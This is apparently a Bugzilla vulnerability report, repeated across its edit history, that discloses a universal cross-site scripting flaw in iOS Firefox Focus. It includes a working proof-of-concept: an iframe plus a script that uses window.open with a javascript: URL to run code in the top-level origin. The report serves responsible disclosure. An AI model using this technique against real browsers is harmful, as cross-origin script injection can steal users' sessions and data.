We are able to achieve UXSS on iOS Firefox Focus with window.open(). document.write shows we are escalating to legitimate top origin site. PoC demo Legitimate Top Origin Site: https://qrcodescanerror.000webhost.com/UXSS.php <iframe src="https://pwning.click/uxsstester.php"/></iframe> Cross-Origin Malicious Evil Site: https://pwning.click/uxsstester.php <script> function a(){ window.open('javascript:document.write(document.domain)', 'x'); setTimeout(function(){ window.open(''); }, 500000); } </script> <center><input type="button" class="button" value="Trigger UXSS!" onclick="a()"></center>
Bug 1855030 Comment 0 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
We are able to achieve UXSS on iOS Firefox Focus with window.open(). document.write shows we are escalating to legitimate top origin site. PoC demo Legitimate Top Origin Site: https://qrcodescanerror.000webhost.com/UXSS.php <iframe src="https://pwning.click/uxsstester.php"/></iframe> Cross-Origin Malicious Evil Site: https://pwning.click/uxsstester.php ```HTML <script> function a(){ window.open('javascript:document.write(document.domain)', 'x'); setTimeout(function(){ window.open(''); }, 500000); } </script> <center><input type="button" class="button" value="Trigger UXSS!" onclick="a()"></center> ```
We are able to achieve UXSS on iOS Firefox Focus with window.open(). document.write shows we are escalating to legitimate top origin site. PoC demo Legitimate Top Origin Site: https://qrcodescanerror.000webhost.com/UXSS.php ```HTML <iframe src="https://pwning.click/uxsstester.php"/></iframe> ``` Cross-Origin Malicious Evil Site: https://pwning.click/uxsstester.php ```HTML <script> function a(){ window.open('javascript:document.write(document.domain)', 'x'); setTimeout(function(){ window.open(''); }, 500000); } </script> <center><input type="button" class="button" value="Trigger UXSS!" onclick="a()"></center> ```